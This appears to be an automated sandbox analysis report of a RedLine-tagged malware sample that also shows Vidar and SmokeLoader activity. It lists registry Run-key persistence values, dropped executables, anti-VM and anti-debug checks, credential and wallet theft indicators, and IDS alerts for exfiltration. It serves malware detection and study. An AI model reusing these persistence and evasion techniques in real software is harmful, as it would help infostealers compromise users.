redline | baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15

Change Default File Association

T1042

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDrive.exe

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4408	4052	rundll32.exe	51
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5712	4052	rundll32.exe	51
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6392	4052	rundll32.exe	51

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2624-212-0x0000000002990000-0x00000000029BE000-memory.dmp	family_redline

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 5784 created 4376	5784	WerFault.exe	102
PID 5448 created 7004	5448	WerFault.exe	266

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 404 created 4812	404	svchost.exe	261
PID 404 created 6480	404	svchost.exe	263

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral2/memory/3260-287-0x0000000003D00000-0x0000000003DD3000-memory.dmp	family_vidar
behavioral2/memory/3260-290-0x0000000000400000-0x00000000021BE000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x000100000001ab36-121.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab35-122.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab36-125.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab35-124.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab38-127.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab38-130.dat	aspack_v212_v242

Blocklisted process makes network request 50 IoCs

flow	pid	Process
169	3068	powershell.exe
281	4828	powershell.exe
283	6080	MsiExec.exe
285	6080	MsiExec.exe
286	6080	MsiExec.exe
288	6080	MsiExec.exe
289	6080	MsiExec.exe
290	6080	MsiExec.exe
291	6080	MsiExec.exe
292	6080	MsiExec.exe
293	6080	MsiExec.exe
294	6080	MsiExec.exe
295	6080	MsiExec.exe
296	6080	MsiExec.exe
297	6080	MsiExec.exe
298	6080	MsiExec.exe
300	6080	MsiExec.exe
301	6080	MsiExec.exe
302	6080	MsiExec.exe
303	6080	MsiExec.exe
305	6080	MsiExec.exe
306	6080	MsiExec.exe
307	6080	MsiExec.exe
308	6080	MsiExec.exe
309	6080	MsiExec.exe
310	6080	MsiExec.exe
311	6080	MsiExec.exe
312	6080	MsiExec.exe
313	6080	MsiExec.exe
315	6080	MsiExec.exe
316	6080	MsiExec.exe
317	6080	MsiExec.exe
318	6080	MsiExec.exe
319	6080	MsiExec.exe
320	6080	MsiExec.exe
321	6080	MsiExec.exe
322	6080	MsiExec.exe
323	6080	MsiExec.exe
324	6080	MsiExec.exe
325	6080	MsiExec.exe
326	6080	MsiExec.exe
327	6080	MsiExec.exe
329	6080	MsiExec.exe
330	6080	MsiExec.exe
331	6080	MsiExec.exe
332	6080	MsiExec.exe
333	6080	MsiExec.exe
334	6080	MsiExec.exe
335	6080	MsiExec.exe
336	6080	MsiExec.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	zab2our.exe

Executes dropped EXE 64 IoCs

pid	Process
2520	setup_installer.exe
3504	setup_install.exe
3260	Fri1544861ac3fe6a.exe
3640	Fri157e25afd971.exe
1544	Fri15af75ee9b.exe
1536	Fri156ec98815f89c.exe
2344	Fri155442fc38b.exe
744	Fri1553f0ee90.exe
3496	7217204.exe
2520	6021605.exe
2624	5045032.exe
1736	LzmwAqmV.exe
4124	Chrome 5.exe
4184	PublicDwlBrowser1100.exe
4256	2.exe
4360	zab2our.exe
4376	setup.exe
4484	7644867.exe
4560	8648482.exe
4664	Pubdate.exe
4712	WinHoster.exe
4932	setup_2.exe
4988	setup_2.tmp
4172	3002.exe
4320	jhuuee.exe
4728	postback.exe
3008	setup_2.exe
4240	setup_2.tmp
4012	taskkill.exe
4788	3224221.exe
4964	7795918.exe
5184	3870284.exe
5272	1558333.exe
5548	3002.exe
6052	ultramediaburner.exe
6084	ultramediaburner.tmp
6100	Nosaqivuwe.exe
3680	Vaeshopegywa.exe
5192	UltraMediaBurner.exe
4728	postback.exe
4432	services64.exe
5708	5063.exe
1772	GcleanerEU.exe
3988	installer.exe
1996	anyname.exe
4692	63FB.exe
4196	gcleaner.exe
6212	anyname.exe
6696	Database.exe
6836	8918.exe
6996	9hzhl0gUw.exe
7092	rnyuf.exe
5732	sihost64.exe
6204	dvr9Exz0c.exe
5644	vildo.exe
4012	rnyuf.exe
4108	vildo.exe
5440	rnyuf.exe
5328	rnyuf.exe
3456	cfsafjc
6060	rnyuf.exe
4812	OneDriveSetup.exe
6480	OneDriveSetup.exe
2056	FileSyncConfig.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8918.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8918.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7644867.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7644867.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3870284.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3870284.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Nosaqivuwe.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	5063.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	63FB.exe

Loads dropped DLL 64 IoCs

pid	Process
3504	setup_install.exe
3504	setup_install.exe
3504	setup_install.exe
3504	setup_install.exe
3504	setup_install.exe
3504	setup_install.exe
3672	Fri157e25afd971.tmp
4988	setup_2.tmp
2096	rundll32.exe
4240	setup_2.tmp
5744	cmd.exe
3260	Fri1544861ac3fe6a.exe
3260	Fri1544861ac3fe6a.exe
3988	installer.exe
3988	installer.exe
3988	installer.exe
6556	MsiExec.exe
6888	rundll32.exe
6556	MsiExec.exe
6080	MsiExec.exe
6080	MsiExec.exe
6080	MsiExec.exe
6080	MsiExec.exe
6080	MsiExec.exe
6080	MsiExec.exe
6080	MsiExec.exe
6080	MsiExec.exe
6080	MsiExec.exe
6080	MsiExec.exe
3988	installer.exe
6080	MsiExec.exe
6080	MsiExec.exe
5140	MsiExec.exe
5140	MsiExec.exe
5140	MsiExec.exe
5140	MsiExec.exe
5140	MsiExec.exe
5140	MsiExec.exe
5140	MsiExec.exe
6080	MsiExec.exe
4108	vildo.exe
4108	vildo.exe
2056	FileSyncConfig.exe
2056	FileSyncConfig.exe
2056	FileSyncConfig.exe
2056	FileSyncConfig.exe
2056	FileSyncConfig.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000100000001ab51-240.dat	themida
behavioral2/files/0x000100000001ab51-246.dat	themida
behavioral2/memory/4484-262-0x0000000000EB0000-0x0000000000EB1000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	6021605.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Dohejegaezhi.exe\""	zab2our.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	rnyuf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\vildo.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\vildo.\\vildo.exe"	rnyuf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\123.cmd = "C:\\ProgramData\\123.\\123.cmd"	rnyuf.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	OneDriveSetup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7644867.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3870284.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8918.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\Q:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
44	ip-api.com
101	ip-api.com

Drops file in System32 directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 07D28FF30FFB6C9D	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1594587808-2047097707-2163810515-1000	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\rnyuf.exe	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
4484	7644867.exe
5184	3870284.exe
6836	8918.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 668 set thread context of 4868	668	svchost.exe	121
PID 4728 set thread context of 4152	4728	postback.exe	169
PID 4432 set thread context of 6964	4432	services64.exe	229
PID 5644 set thread context of 4108	5644	vildo.exe	245

Drops file in Program Files directory 18 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\WindowsPowerShell\Dohejegaezhi.exe	zab2our.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File created	C:\Program Files\Windows Photo Viewer\THZRGZUVDR\ultramediaburner.exe	zab2our.exe
File created	C:\Program Files\Windows Photo Viewer\THZRGZUVDR\ultramediaburner.exe.config	zab2our.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-PFGIG.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-QGG1N.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-QN6J7.tmp	setup_2.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\WindowsPowerShell\Dohejegaezhi.exe.config	zab2our.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe

Drops file in Windows directory 37 IoCs

description	ioc	Process
File created	C:\Windows\Installer\f75cac6.msi	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\f75cac3.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDA57.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDB81.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI410F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI41FA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4BB1.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSIDC1E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1BCA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI39C7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1550.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1E7B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI236E.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Installer\f75cac3.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\Installer\MSI3EBB.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4014.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSID795.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID8DE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3C58.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1774.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2179.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI446C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICF95.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID9BA.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 26 IoCs

pid	pid_target	Process	procid_target
3756	4256	WerFault.exe	107
4956	4376	WerFault.exe	102
4132	3260	WerFault.exe	88
4976	4376	WerFault.exe	102
5080	3260	WerFault.exe	88
4596	4376	WerFault.exe	102
4196	3260	WerFault.exe	88
5080	4376	WerFault.exe	102
2756	3260	WerFault.exe	88
5172	4376	WerFault.exe	102
5300	3260	WerFault.exe	88
5436	3260	WerFault.exe	88
5588	3260	WerFault.exe	88
5784	4376	WerFault.exe	102
5964	3260	WerFault.exe	88
4652	3260	WerFault.exe	88
4288	3496	WerFault.exe	95
2696	3260	WerFault.exe	88
5456	3260	WerFault.exe	88
4268	3260	WerFault.exe	88
5076	3260	WerFault.exe	88
2460	3260	WerFault.exe	88
1548	3260	WerFault.exe	88
5736	4560	WerFault.exe	104
6632	7004	WerFault.exe	266
5448	7004	WerFault.exe	266

Checks SCSI registry key(s) 3 TTPs 16 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	SystemSettings.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	vildo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	vildo.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	OneDrive.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5728	schtasks.exe
6516	schtasks.exe
2220	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5476	timeout.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
6520	taskkill.exe
6456	taskkill.exe
4012	taskkill.exe
1524	taskkill.exe
5164	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 18 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Process not Found
